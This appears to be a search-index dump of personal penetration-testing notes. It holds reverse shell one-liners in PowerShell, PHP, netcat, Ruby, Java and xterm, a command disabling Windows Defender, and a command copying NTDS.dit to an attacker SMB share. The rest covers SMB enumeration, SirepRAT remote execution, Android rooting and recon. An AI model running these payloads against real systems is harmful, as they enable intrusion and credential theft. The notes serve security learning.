    powershell -nop -c \"$client = New-Object System.Net.Sockets.TCPClient('10.10.14.158',443);$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );$sendback2 = $sendback + 'PS ' + (pwd).Path + '> ';$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close()\"\n\n# same, but without assigning $client to the new object\npowershell -NoP -NonI -W Hidden -Exec Bypass -Command New-Object System.Net.Sockets.TCPClient(\"10.10.10.10\",1234);$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );$sendback2  = $sendback + \"PS \" + (pwd).Path + \"> \";$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close()\n\n# powershell -nop -c \n# Executes powershell.exe with no profile (nop) and executes the command/script block (-c or -Command) contained in the quotes\n\n# \"$client = New-Object System.Net.Sockets.TCPClient(10.10.14.158,433);\n# Sets/evaluates the variable $client equal to (=) the New-Object cmdlet, which creates an instance of the System.Net.Sockets.TCPClient .NET framework object. The .NET framework object will connect with the TCP socket listed in the parentheses (10.10.14.158,443). The semi-colon (;) ensures the commands & code are executed sequentially.\n\n# $stream = $client.GetStream();\n# Sets/evaluates the variable $stream equal to (=) the $client variable and the .NET framework method called GetStream that facilitates network communications. \n\n# [byte[]]$bytes = 0..65535|%{0}; \n# Creates a byte type array ([]) called $bytes that returns 65,535 zeros as the values in the array. This is essentially an empty byte stream that will be directed to the TCP listener on an attack box awaiting a connection.\n\n# while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0)\n\n# Starts a while loop containing the $i variable set equal to (=) the .NET framework Stream.Read ($stream.Read) method. The parameters: buffer ($bytes), offset (0), and count ($bytes.Length) are defined inside the parentheses of the method.\n\n\n# {;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes, 0, $i);\n# Sets/evaluates the variable $data equal to (=) an ASCII encoding .NET framework class that will be used in conjunction with the GetString method to encode the byte stream ($bytes) into ASCII. In short, what we type won't just be transmitted and received as empty bits but will be encoded as ASCII text. \n\n# $sendback = (iex $data 2>&1 | Out-String ); \n# Sets/evaluates the variable $sendback equal to (=) the Invoke-Expression (iex) cmdlet against the $data variable, then redirects the standard error (2>) & standard input (1) through a pipe (|) to the Out-String cmdlet which converts input objects into strings. Because Invoke-Expression is used, everything stored in $data will be run on the local computer. \n\n# $sendback2 = $sendback + 'PS ' + (pwd).path + '> '; \n# Sets/evaluates the variable $sendback2 equal to (=) the $sendback variable plus (+) the string PS ('PS') plus + path to the working directory ((pwd).path) plus (+) the string '> '. This will result in the shell prompt being PS C:\\workingdirectoryofmachine >. \n\n# $sendbyte=  ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()}\n# Sets/evaluates the variable $sendbyte equal to (=) the ASCII encoded byte stream that will use a TCP client to initiate a PowerShell session with a Netcat listener running on the attack box.\n
     Set-MpPreference -DisableRealtimeMonitoring $true\n
    ","tags":["pentesting","web","pentesting","reverse-shells"]},{"location":"reverse-shells/#php","title":"php","text":"
    php -r '$sock=fsockopen(\"10.0.0.1\",1234);exec(\"/bin/sh -i <&3 >&3 2>&3\");'\n
    ","tags":["pentesting","web","pentesting","reverse-shells"]},{"location":"reverse-shells/#netcat","title":"netcat","text":"
    nc -e /bin/sh 10.0.0.1 1234\n\nrm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.0.0.1 1234 >/tmp/f\n
    ","tags":["pentesting","web","pentesting","reverse-shells"]},{"location":"reverse-shells/#ruby","title":"ruby","text":"
    ruby -rsocket -e'f=TCPSocket.open(\"10.0.0.1\",1234).to_i;exec sprintf(\"/bin/sh -i <&%d >&%d 2>&%d\",f,f,f)'\n
    ","tags":["pentesting","web","pentesting","reverse-shells"]},{"location":"reverse-shells/#java","title":"java","text":"
    r = Runtime.getRuntime()\np = r.exec([\"/bin/bash\",\"-c\",\"exec 5<>/dev/tcp/10.0.0.1/2002;cat <&5 | while read line; do \\$line 2>&5 >&5; done\"] as String[])\np.waitFor()\n
    ","tags":["pentesting","web","pentesting","reverse-shells"]},{"location":"reverse-shells/#xterm","title":"xterm","text":"
    xterm -display 10.0.0.1:1\n
    ","tags":["pentesting","web","pentesting","reverse-shells"]},{"location":"rooting-mobile/","title":"Rooting mobile","text":""},{"location":"rooting-mobile/#samsung-galaxy-a515f","title":"Samsung Galaxy A515F","text":""},{"location":"rooting-mobile/#install-a-windows-10-vm-in-your-phisical-kali-machine","title":"Install a Windows 10 VM in your phisical kali machine","text":"
    1. Install a Windows10 VM in your preferred hyper XXX technology.

    2. Virtualize your USB in the windows machine: VirtualBox > Settings (on the desired VM) > USB > Make sure usb 3 is selected > click on + icon and select device.

    Troubleshooting: You may find that your android phone does not appear there yet. The reason behind might be that the user responsible for the virtualbox process has no permissions to access the USB mounted devices. We will add it in our phisical machine (kali):

    sudo usermod -a -G vboxusers $username\nnewgrp vboxusers\n\n# and reboot kali\n

    After that, replay step 2 and we should see the device.

    "},{"location":"rooting-mobile/#install-samsung-drivers-in-your-windows-vm","title":"Install Samsung drivers in your Windows VM","text":"

    There is this video with assistance for this: https://www.youtube.com/watch?v=K3Jk7dCvdNM.

    This is the download link for getting those drivers: https://developer.samsung.com/android-usb-driver.

    And try to install Samsung Dex. I could not, but since I have the drivers installed, this was optional.

    "},{"location":"rooting-mobile/#backup-your-mobile","title":"Backup your mobile","text":"

    Because we are going to go to fabric resetting

    "},{"location":"rooting-mobile/#enable-developers-mode-in-your-device","title":"Enable developers mode in your device","text":"

    Go to Settings > About the phone > Software Information > and tap I don't know how many times on \"Build Number\" (5?). Eventually you will see a message with a countdown number to enable \"Developer mode\".

    "},{"location":"rooting-mobile/#enable-debug-mode","title":"Enable Debug mode","text":"

    Go to Settings > Developer options (now these are enabled) > Debug mode ---set to on

    "},{"location":"rooting-mobile/#set-oem-unlocking-to-on","title":"Set OEM unlocking to ON","text":"

    Go to Settings > Developer options (now these are enabled) > OEM unlocking ---set to on

    "},{"location":"rooting-mobile/#get-into-download-mode-and-unblock-the-bootloader","title":"Get into Download mode and unblock the Bootloader","text":"

    Turn off your android phone completely. But completely.

    Press volume up and press volume down both at the same time and keep it press. Connect at the same time the USB-C cable to your device (and to your computer) and you will see a Warning screen. When you see it, you can stop pressing the up-down volume buttons.

    Now, long press Volume up button and you will see this message (stop pressing when you see it):

    The following two steps are:

    Press volume up once, and you will see a black screen. When the screens turns into black press quickly volume up and down at the same time once. With that Bootloader will be unblocked.

    Now we will enter in the Download mode,

    only by pressing once on the volume up button.

    Leave the device and go to your windows.

    "},{"location":"rooting-mobile/#flash-the-device-from-the-windows-vm","title":"Flash the device from the windows VM","text":"

    Firstable, you will need to make sure that you have the proper firmware file. For that open the properties of your device and see the firmware version:

    This, alone with your mobile model, will be useful for finding the firmware.

    Download it to your windows VM and unzip it.

    Open Odin.

    Make sure the device appears.

    Go to Options tab and disable \"Auto Reboot\". In AP, select the file and have fun, the process may take a while:

    Click on Start and wait until you see the PASS message:

    Be careful not to disconnect the USB-C cable.

    "},{"location":"rooting-mobile/#enter-in-recovery-mode","title":"Enter in Recovery mode","text":"

    Go back to your Android Device and long press the 3 buttons (volume Up - Volume Down - and Power) at the same time.

    When the screen turns into black, remove the pressing only from the Volume Down until the logo of Samsung appears. From that point we need to count to three and then remove the pressing only from the Power button and keep pressing Volume Up.

    ...

    Troubleshooting: Aparently, I did not do it correctly and got stuck in the situation in which, my phone was is download mode displaying RMM/KG State: Prenormal. So my phone had no OEM unlocking enable option and could not be rooted. The solution: https://www.youtube.com/watch?v=TBUY05mnCP8

    After that I did not know if I had to go back to the flash step or Iif I should try to get to the download mode and then try to get into the recovery mode. I went through a loop of turning on and off, with several reinstallations and frozen screens with Samsung logo in it. I saw the \"erasing\" mesage several times and...

    Odin3 v3.14.4 : https://dl2018.sammobile.com/Odin.zipDriver

    de Samsung : https://developer.samsung.com/android-usb-driver

    TWRP : https://forum.xda-developers.com/t/recovery-unofficial-teamwin-recovery-project-v3-6-2-android-11-12.4400869/Magisk : https://github.com/topjohnwu/Magisk

    MultiDisabler : https://forum.xda-developers.com/t/pie-10-11-system-as-root-multidisabler-disables-encryption-vaultkeeper-auto-flash-of-stock-recovery-proca-wsm-cass-etc.3919714/

    Samsung health Samsung Gear Samsung Safe folder -enable

    Rooting a device will allow us to:

    • install custom rom based on One UI, pure android and ROM gsi and android generic images
    • modify in device app that requires root access

    Also we will loose some Samsung features. Samsung ... path Samsung health Samsung Gear Samsung Safe folder Guarantee

    But some of these features (Samsung health, Samsung Gear, Samsung Safe) x1may be recovered with a custom ROM

    How to enable USB in virtualbox: https://www.techrepublic.com/article/how-to-enable-usb-in-virtualbox/

    "},{"location":"rpcclient/","title":"rpcclient - A tool for interacting with smb shares","text":"

    This is a tool to perform MS-RPC functions.

    The Remote Procedure Call (RPC) is a central tool to realize operational and work-sharing structures in networks and client-server architectures.

    Remote Procedure Call (RPC) is a powerful technique for constructing distributed, client-server based applications. It is based on extending the conventional local procedure calling so that the called procedure need not exist in the same address space as the calling procedure. The two processes may be on the same system, or they may be on different systems with a network connecting them.

    ","tags":["smb","port 445","port 137","port 138","port 139","samba","tools"]},{"location":"rpcclient/#basic-usage","title":"Basic usage","text":"
    # Connect to a remote shared folder (same as smbclient in this regard)\nrpcclient -U \"\" 10.129.14.128\n\n# Server information\nsrvinfo\n\n# Enumerate all domains that are deployed in the network \nenumdomains\n\n# Provides domain, server, and user information of deployed domains.\nquerydominfo\n\n# Enumerates all available shares.\nnetshareenumall\n\n# Provides information about a specific share.\nnetsharegetinfo <share>\n\n# Enumerates all domain users.\nenumdomusers\n\n# Provides information about a specific user.\nqueryuser <RID>\n    # An example:\n    # rpcclient $> queryuser 0x3e8\n\n# Provides information about a specific group.\nquerygroup <ID>\n
    ","tags":["smb","port 445","port 137","port 138","port 139","samba","tools"]},{"location":"rpcclient/#brute-forcing-user-enumeration-with-rpcclient","title":"Brute forcing user enumeration with rpcclient","text":"
    for i in $(seq 500 1100);do rpcclient -N -U \"\" $ip -c \"queryuser 0x$(printf '%x\\n' $i)\" | grep \"User Name\\|user_rid\\|group_rid\" && echo \"\";done\n
    ","tags":["smb","port 445","port 137","port 138","port 139","samba","tools"]},{"location":"rsat-remote-server-administration-tools/","title":"Remote Server Administration Tools (RSAT)","text":"

    The Remote Server Administration Tools (RSAT) have been part of Windows since the days of Windows 2000. RSAT allows systems administrators to remotely manage Windows Server roles and features from a workstation running Windows 10, Windows 8.1, Windows 7, or Windows Vista. RSAT can only be installed on Professional or Enterprise editions of Windows.

    • Script to install RSAT on Windows 10 1809, 1903, and 1909.
    • Other versions of Windows and more documentation.
    # Check if RSAT tools are installed\nGet-WindowsCapability -Name RSAT* -Online \\| Select-Object -Property Name, State\n\n# Install all RSAT tools\nGet-WindowsCapability -Name RSAT* -Online \\| Add-WindowsCapability \u2013Online\n\n# Install a specific RSAT tool, for instance Rsat.ActiveDirectory.DS-LDS.Tools \nAdd-WindowsCapability -Name Rsat.ActiveDirectory.DS-LDS.Tools~~~~0.0.1.0  \u2013Online\n

    Once installed, all of the tools will be available under: Control Panel> All Control Panel Items >Administrative Tools.

    ","tags":["tools"]},{"location":"rules-of-engagement-checklist/","title":"Rules of Engagement - Checklist","text":"Checkpoint Contents \u2610 Introduction Description of this document. \u2610 Contractor Company name, contractor full name, job title. \u2610 Penetration Testers Company name, pentesters full name. \u2610 Contact Information Mailing addresses, e-mail addresses, and phone numbers of all client parties and penetration testers. \u2610 Purpose Description of the purpose for the conducted penetration test. \u2610 Goals Description of the goals that should be achieved with the penetration test. \u2610 Scope All IPs, domain names, URLs, or CIDR ranges. \u2610 Lines of Communication Online conferences or phone calls or face-to-face meetings, or via e-mail. \u2610 Time Estimation Start and end dates. \u2610 Time of the Day to Test Times of the day to test. \u2610 Penetration Testing Type External/Internal Penetration Test/Vulnerability Assessments/Social Engineering. \u2610 Penetration Testing Locations Description of how the connection to the client network is established. \u2610 Methodologies OSSTMM, PTES, OWASP, and others. \u2610 Objectives / Flags Users, specific files, specific information, and others. \u2610 Evidence Handling Encryption, secure protocols \u2610 System Backups Configuration files, databases, and others. \u2610 Information Handling Strong data encryption \u2610 Incident Handling and Reporting Cases for contact, pentest interruptions, type of reports \u2610 Status Meetings Frequency of meetings, dates, times, included parties \u2610 Reporting Type, target readers, focus \u2610 Retesting Start and end dates \u2610 Disclaimers and Limitation of Liability System damage, data loss \u2610 Permission to Test Signed contract, contractors agreement","tags":["information-gathering","rules of engagement","cpts"]},{"location":"samba-suite/","title":"Samba Suite","text":"

    It\u2019s used to enumerate info. It might be used in a Null session attack.

    ","tags":["pentesting"]},{"location":"samba-suite/#installation","title":"Installation","text":"

    Download it from: https://www.samba.org/

    ","tags":["pentesting"]},{"location":"samba-suite/#basic-commands","title":"Basic commands","text":"
    1. Enumerate File Server services:
    nmblookup -A $ip\n
    1. Also with the smbclient we can enumerate the shares provides by a host:
    smbclient -L //$ip -N\n\n# -L\u00a0 Look at what services are available on a target\n# $ip\u00a0Prepend the two slahes\n# -N \u00a0Force the tool not to ask for a password\n
    1. Connect:
    smbclient \\\\$ip\\sharedfolder -N\n

    Be careful, sometimes the shell removes the slashes and you need to escape them.

    1. Once connected you can browse with the smb command line. To see allowed commands: help
    2. When you know the path of a file and you want to retrieve it:
      • from kali:
        smbget smb://$ip/SharedFolder/flag_1.txt\n
      • from smb command line:
        get flag_1.txt\n
    ","tags":["pentesting"]},{"location":"samrdump/","title":"SAMRDump","text":"

    Impacket\u2019s samrdump.py communicates with the Security Account Manager Remote (SAMR) interface to list system user accounts, available resource shares, and other sensitive information.

    ","tags":["pentesting windows"]},{"location":"samrdump/#basic-commands","title":"Basic commands","text":"
    # path: /usr/share/doc/python3-impacket/examples/samrdump.py\npython3 samrdump.py $ip\n
    ","tags":["pentesting windows"]},{"location":"scrcpy/","title":"scrcpy","text":"","tags":["mobile pentesting","android"]},{"location":"scrcpy/#installation","title":"Installation","text":"

    Download from: https://github.com/Genymobile/scrcpy.

    ","tags":["mobile pentesting","android"]},{"location":"scrcpy/#on-linux","title":"On Linux","text":"

    Source: https://github.com/Genymobile/scrcpy/blob/master/doc/linux.md

    First, you need to install the required packages:

    # for Debian/Ubuntu\nsudo apt install ffmpeg libsdl2-2.0-0 adb wget \\\n                 gcc git pkg-config meson ninja-build libsdl2-dev \\\n                 libavcodec-dev libavdevice-dev libavformat-dev libavutil-dev \\\n                 libswresample-dev libusb-1.0-0 libusb-1.0-0-dev\n

    Then clone the repo and execute the installation script (source):

    git clone https://github.com/Genymobile/scrcpy\ncd scrcpy\n./install_release.sh\n

    When a new release is out, update the repo and reinstall:

    git pull\n./install_release.sh\n

    To uninstall:

    sudo ninja -Cbuild-auto uninstall\n

    Note that this simplified process only works for released versions (it downloads a prebuilt server binary), so for example you can't use it for testing the development branch (dev).

    ","tags":["mobile pentesting","android"]},{"location":"scrcpy/#basic-usage","title":"Basic usage","text":"
    scrcpy\n
    ","tags":["mobile pentesting","android"]},{"location":"scrcpy/#debugging","title":"Debugging","text":"

    For scrcpy to work, there must be an adb connection, which requires:

    • Having developer mode enabled.
    • Having USB debug mode enabled.

    And there\u2019s an extra security restriction on Xiaomi Miui devices, which prevents USB debugging assigning permissions by default:

    USB debugging (Security settings) Allow granting permissions and simulating input via USB debugging

    This may require to sign in into a Xiaomi account (or sign up if you have no account.)

    Otherwise you will obtain messages such as

    ","tags":["mobile pentesting","android"]},{"location":"searchsploit/","title":"searchsploit","text":"

    The Exploit Database is an archive of public exploits and corresponding vulnerable software, developed for use by penetration testers and vulnerability researchers.

    ","tags":["pentesting","web pentesting","exploitation"]},{"location":"searchsploit/#installation","title":"Installation","text":"

    Pre-installed in kali. Download it from: https://gitlab.com/exploit-database/exploitdb Also:

    sudo apt install exploitdb -y\n
    ","tags":["pentesting","web pentesting","exploitation"]},{"location":"searchsploit/#basic-usage","title":"Basic usage","text":"
    searchsploit <WhatYouAreLookingFor>\n

    Example:

    If you want to have a look at those POCs, append the path provided to the root location for the searchsploit database (/usr/share/exploitdb/exploits).

    ","tags":["pentesting","web pentesting","exploitation"]},{"location":"seatbelt/","title":"Seatbelt","text":"

    Seatbelt is a C# project that performs a number of security oriented host-survey \"safety checks\" relevant from both offensive and defensive security perspectives.

    ","tags":["pentesting","windows pentesting","enumeration"]},{"location":"seatbelt/#installation","title":"Installation","text":"

    Github repo: https://github.com/GhostPack/Seatbelt.

    ","tags":["pentesting","windows pentesting","enumeration"]},{"location":"servers/","title":"Setting up a server (in the attacking machine)","text":"Protocol / app smb server Apache server ngix symple python server php web server Ruby web server Burp Suite Collaborator Interactsh responder","tags":["servers","file transfer"]},{"location":"servers/#smb-server","title":"smb server","text":"

    Launch smbserver in our attacker machine:

    sudo python3 /usr/share/doc/python3-impacket/examples/smbserver.py -smb2support CompData /home/username/Documents/\n

    Now, from PS in the victim's windows machine we could upload a folder to the shared folder in the attacker machine just by running:

    cmd.exe /c move C:\\NTDS\\NTDS.dit \\\\$ip\\CompData\n
    ","tags":["servers","file transfer"]},{"location":"servers/#apache-server","title":"Apache server","text":"

    Once you have a folder structure such as \"/var/www/\" or \"/var/www/html\", and also an Apache server installed, you can serve all files from that path by initiating the service:

    # Start Apache\nservice apache2 start\n\n# Stop Apache\nservice apache2 stop\n\n# Restart Apache\nservice apache2 restart\n\n# See status of Apache server\nservice apache2 status\n

    In Apache, the PHP module loves to execute anything ending in PHP. Also, by default, with Apache, if we hit a directory without an index file (index.html), it will list all the files.

    ","tags":["servers","file transfer"]},{"location":"servers/#nginx","title":"Nginx","text":"

    In Apache, the PHP module loves to execute anything ending in PHP. This is not very safe when allowing HTTP uploads, as we are trying to avoid that users cannot upload web shells and execute them.

    # Create a Directory to Handle Uploaded Files\nsudo mkdir -p /var/www/uploads/SecretUploadDirectory\n\n# Change the Owner to www-data\nsudo chown -R www-data:www-data /var/www/uploads/SecretUploadDirectory\n\n# Create Nginx Configuration File by creating the file /etc/nginx/sites-available/upload.conf with the contents:\nserver {\n    listen 9001;\n\n    location /SecretUploadDirectory/ {\n        root    /var/www/uploads;\n        dav_methods PUT;\n    }\n}\n\n# Symlink our Site to the sites-enabled Directory\nsudo ln -s /etc/nginx/sites-available/upload.conf /etc/nginx/sites-enabled/\n\n# Start Nginx\nsudo systemctl restart nginx.service\n\n# If we get any error messages, check /var/log/nginx/error.log. we might see, for instance, port 80 is already in use.\n

    Debuggin nginx:

    First check: ensure the directory listing is not enabled by navigating to http://localhost/SecretUploadDirectory

    Second check: Is default port in nginx already in use?

    # Verifying Errors\ntail -2 `/var/log/nginx/error.log`\n# and we might check that port 80 could not be binded because is already in use\n\n# See which service is using port 80\nss -lnpt | grep `80`\n# we will obtain the service and also the pid. For instance `2811`\n\n# Check pid, for instance pid 2811, and see who is running it\nps -ef | grep \"2811\"\n\n# Remove NginxDefault Configuration to get around this, we can remove the default Nginx configuration, which binds on port 80.\nsudo rm /etc/nginx/sites-enabled/default\n

    Finally you can copy to your nging server all files you want to transfer with curl:

    curl -T file.txt\n# -T, --upload-file <file>; This transfers the specified local file to the remote URL. -T uses PUT http method\n
    ","tags":["servers","file transfer"]},{"location":"servers/#simple-python-server","title":"Simple python server","text":"
    # Creating a Web Server with Python3\ncd /tmp\npython3 -m http.server 8000\n\n# Creating a Web Server with Python2.7\npython2.7 -m SimpleHTTPServer\n
    ","tags":["servers","file transfer"]},{"location":"servers/#php-web-server","title":"PHP web server","text":"
    php -S 0.0.0.0:8000\n
    ","tags":["servers","file transfer"]},{"location":"servers/#ruby-web-server","title":"Ruby Web Server","text":"
    ruby -run -ehttpd . -p8000\n
    ","tags":["servers","file transfer"]},{"location":"setting-up-mobile-penstesting/","title":"Setting up the mobile pentesting environment","text":"

    Instructions

    1. Start by installing drozer.
    2. Install frida and, also, Burp certificate in frida.
    3. Install apktool.
    4. Install Objection.

    Nice-to-have tools

    1. Mobile Security Framework: MobSF.
    2. mobsfscan.

    ADB (Android Debug Bridge) cheat sheet.

    ","tags":["mobile pentesting"]},{"location":"setting-up-mobile-penstesting/#resources","title":"Resources","text":"

    https://medium.com/@lightbulbr/how-to-root-an-android-emulator-with-tiramisu-android-13-f070a756c499

    Install Java JDK: https://wiki.centos.org/HowTos(2f)JavaDevelopmentKit.html

    ","tags":["mobile pentesting"]},{"location":"sharpview/","title":"SharpView","text":"

    (C#) - Doesn't support filtering using Pipeline\u00a0

    ","tags":["active directory","ldap","windows","enumeration","reconnaissance","tools"]},{"location":"sharpview/#installation","title":"Installation","text":"

    .NET port of\u00a0PowerView

    Download github repo from: https://github.com/tevora-threat/SharpView/.

    ","tags":["active directory","ldap","windows","enumeration","reconnaissance","tools"]},{"location":"shodan/","title":"shodan","text":"

    Shodan can be used to find devices and systems permanently connected to the Internet like Internet of Things (IoT). It searches the Internet for open TCP/IP ports and filters the systems according to specific terms and criteria. For example, open HTTP or HTTPS ports and other server ports for FTP, SSH, SNMP, Telnet, RTSP, or SIP are searched. As a result, we can find devices and systems, such as surveillance cameras, servers, smart home systems, industrial controllers, traffic lights and traffic controllers, and various network components.

    "},{"location":"shodan/#search-parameters","title":"Search parameters","text":"
    country:\ncity:\ngeo:\nhostname:\nnet:\nos:\nport:\nbefore: / after:\n
    "},{"location":"shodan/#example-shodan-for-enumeration","title":"Example: shodan for enumeration","text":"

    Content from Pentesting notes:

    crt.sh: it enables the verification of issued digital certificates for encrypted Internet connections. This is intended to enable the detection of false or maliciously issued certificates for a domain.

    # Get all subdomais with that digital certificate\ncurl -s https://crt.sh/\\?q\\=example.com\\&output\\=json | jq .\n\n# Filter all by unique subdomain\ncurl -s https://crt.sh/\\?q\\=example.com\\&output\\=json | jq . | grep name | cut -d\":\" -f2 | grep -v \"CN=\" | cut -d'\"' -f2 | awk '{gsub(/\\\\n/,\"\\n\");}1;' | sort -u\n\n# With the list of unique subdomains, list all the Company hosted servers\nfor i in $(cat subdomainlist);do host $i | grep \"has address\" | grep example.com | cut -d\" \" -f4 >> ip-addresses.txt;done\n

    Shodan: Once we see which hosts can be investigated further, we can generate a list of IP addresses with a minor adjustment to the cut command and run them through Shodan.

    for i in $(cat ip-addresses.txt);do shodan host $i;done\n

    Go to Pentesting notes to pursuit DNS enumeration.

    "},{"location":"sireprat/","title":"SirepRAT - RCE as SYSTEM on Windows IoT Core","text":"

    SirepRAT\u00a0Features full RAT capabilities without the need of writing a real RAT malware on target.

    https://github.com/SafeBreach-Labs/SirepRAT#context)

    ","tags":["windows","rce"]},{"location":"sireprat/#installation","title":"Installation","text":"
    # Download the repository\ngit clone https://github.com/SafeBreach-Labs/SirepRAT.git\n\n# Run the installation\npip install -r requirements.txt\n
    ","tags":["windows","rce"]},{"location":"sireprat/#basic-usage","title":"Basic usage","text":"","tags":["windows","rce"]},{"location":"sireprat/#usage","title":"Usage","text":"
    # Download File bash\npython SirepRAT.py $ip GetFileFromDevice --remote_path \"C:\\Windows\\System32\\drivers\\etc\\hosts\" --v\n\n# Upload File\npython SirepRAT.py $ip PutFileOnDevice --remote_path \"C:\\Windows\\System32\\uploaded.txt\" --data \"Hello IoT world!\"\n\n# Run Arbitrary Program\npython SirepRAT.py $ip LaunchCommandWithOutput --return_output --cmd \"C:\\Windows\\System32\\hostname.exe\"\n\n# With arguments, impersonated as the currently logged on user:\npython SirepRAT.py $ip LaunchCommandWithOutput --return_output --as_logged_on_user --cmd \"C:\\Windows\\System32\\cmd.exe\" --args \" /c echo {{userprofile}}\"\n\n# Try to run it without the\u00a0as_logged_on_user\u00a0flag to demonstrate the SYSTEM execution capability)\n# Get System Information\npython SirepRAT.py $ip GetSystemInformationFromDevice\n
    ","tags":["windows","rce"]},{"location":"sireprat/#get-file-information","title":"Get File Information","text":"
    python SirepRAT.py 192.168.3.17 GetFileInformationFromDevice --remote_path \"C:\\Windows\\System32\\ntoskrnl.exe\"\n
    ","tags":["windows","rce"]},{"location":"sireprat/#see-help-for-full-details","title":"See help for full details:","text":"
    python SirepRAT.py --help\n
    ","tags":["windows","rce"]},{"location":"sireprat/#author","title":"Author","text":"","tags":["windows","rce"]},{"location":"sireprat/#related-labs","title":"Related Labs","text":"","tags":["windows","rce"]},{"location":"smbclient/","title":"smbclient - A tool for interacting with smb shares","text":"

    See Quick Cheat sheet for smbclient.

    ","tags":["smb","port 445","port 137","port 138","port 139","samba","tools"]},{"location":"smbclient/#smbclient-installation","title":"smbclient installation","text":"
    sudo apt-get install smbclient\n
    ","tags":["smb","port 445","port 137","port 138","port 139","samba","tools"]},{"location":"smbclient/#smbclient-configuration","title":"smbclient configuration","text":"

    Default settings are in /etc/samba/smb.conf.

     cat /etc/samba/smb.conf | grep -v \"#\\|\\;\" \n
    Setting Description [sharename] The name of the network share. workgroup = WORKGROUP/DOMAIN Workgroup that will appear when clients query. path = /path/here/ The directory to which user is to be given access. server string = STRING The string that will show up when a connection is initiated. unix password sync = yes Synchronize the UNIX password with the SMB password? usershare allow guests = yes Allow non-authenticated users to access defined shared? map to guest = bad user What to do when a user login request doesn't match a valid UNIX user? browseable = yes Should this share be shown in the list of available shares? guest ok = yes Allow connecting to the service without using a password? read only = yes Allow users to read files only? create mask = 0700 What permissions need to be set for newly created files?

    For pentesting notes on ports 137, 138, 139 and 445 with a smb service, see 137-138-139-445-smb.

    ","tags":["smb","port 445","port 137","port 138","port 139","samba","tools"]},{"location":"smbclient/#smbclient-connection","title":"smbclient connection","text":"

    See

    # [-L|--list=HOST] : Selecting the targeted host for the connection request.\nsmbclient -L -N //$ip\n# -N: Suppresses the password prompt.\n# -L: retrieve a list of available shares on the remote host\n

    Smbclient will attempt to connect to the remote host and check if there is any authentication required. If there is, it will ask you for a user and a password for your local username. If we do not specify a specific username to smbclient when attempting to connect to the remote host, it will just use your local machine's username.If vulnerable and performing a Null Attack, we will hit Enter when prompted for a password.

    After authenticating, we may obtain access to some typical shared folders, such as:

    ADMIN$ - Administrative shares are hidden network shares created by the Windows NT family of operating systems that allow system administrators to have remote access to every disk volume on a network-connected system. These shares may not be permanently deleted but may be disabled.\n\nC$ - Administrative share for the C:\\ disk volume. This is where the operating system is hosted.\n\nIPC$ - The inter-process communication share. Used for inter-process communication via named pipes and is not part of the file system.\nWorkShares - Custom share. \n

    We will try to connect to each of the shares except for the IPC$ one, which is not valuable for us since it is not browsable as any regular directory would be and does not contain any files that we could use at this stage of our learning experience:

    # the use of / and \\ might be different if you need to escape some characters\nsmbclient \\\\\\\\$ip\\\\ADMIN$\n

    Important: Sometimes some jugling is needed:

    smbclient -N -L \\\\$ip\nsmbclient -N -L \\\\\\\\$ip\nsmbclient -N -L /\\/\\$ip\n

    If we have NT_STATUS_ACCESS_DENIED as output, we do not have the proper credentials to connect to this share.

    Connect to a Shared folders as Administrator:

    smbclient -L 10.129.228.98 -U Administrator\n

    Also we can use rpcclient tool for connecting to the shared folders.

    ","tags":["smb","port 445","port 137","port 138","port 139","samba","tools"]},{"location":"smbclient/#basic-commands-in-smbclient","title":"Basic commands in SMBclient","text":"
    # Show available commands\nhelp\n\n# Download a file\nget <file>\n\n# See status\nsmbstatus\n\n# Smbclient also allows us to execute local system commands using an exclamation mark at the beginning (`!<cmd>`) without interrupting the connection.\n!cmd\n\n!cat prep-prod.txt\n
    ","tags":["smb","port 445","port 137","port 138","port 139","samba","tools"]},{"location":"smbclient/#quick-cheat-sheet","title":"Quick cheat sheet","text":"
    # List shares on a machine using NULL Session\nsmbclient -L <target-IP>\n\n# List shares on a machine using a valid username + password\nsmbclient -L \\<target-IP\\> -U username%password\n\n# Connect to a valid share with username + password\nsmbclient //\\<target\\>/\\<share$\\> -U username%password\n\n# List files on a specific share\nsmbclient //\\<target\\>/\\<share$\\> -c 'ls' password -U username\n\n# List files on a specific share folder inside the share\nsmbclient //\\<target\\>/\\<share$\\> -c 'cd folder; ls' password -U username\n\n# Download a file from a specific share folder\nsmbclient //\\<target\\>/\\<share$\\> -c 'cd folder;get desired_file_name' password -U username\n\n# Copy a file to a specific share folder\nsmbclient //\\<target\\>/\\<share$\\> -c 'put /var/www/my_local_file.txt .\\target_folder\\target_file.txt' password -U username\n\n# Create a folder in a specific share folder\nsmbclient //\\<target\\>/\\<share$\\> -c 'mkdir .\\target_folder\\new_folder' password -U username\n\n# Rename a file in a specific share folder\nsmbclient //\\<target\\>/\\<share$\\> -c 'rename current_file.txt new_file.txt' password -U username\n
    ","tags":["smb","port 445","port 137","port 138","port 139","samba","tools"]},{"location":"smbmap/","title":"SMBMap","text":"

    SMBMap allows users to enumerate samba share drives across an entire domain. List share drives, drive permissions, share contents, upload/download functionality, file name auto-download pattern matching, and even execute remote commands.

    ","tags":["smb","pass-the-hash","file upload","rce","tools"]},{"location":"smbmap/#installation","title":"Installation","text":"

    Installation from https://github.com/ShawnDEvans/smbmap

    sudo pip3 install smbmap\nsmbmap\n
    ","tags":["smb","pass-the-hash","file upload","rce","tools"]},{"location":"smbmap/#basic-usage","title":"Basic usage","text":"
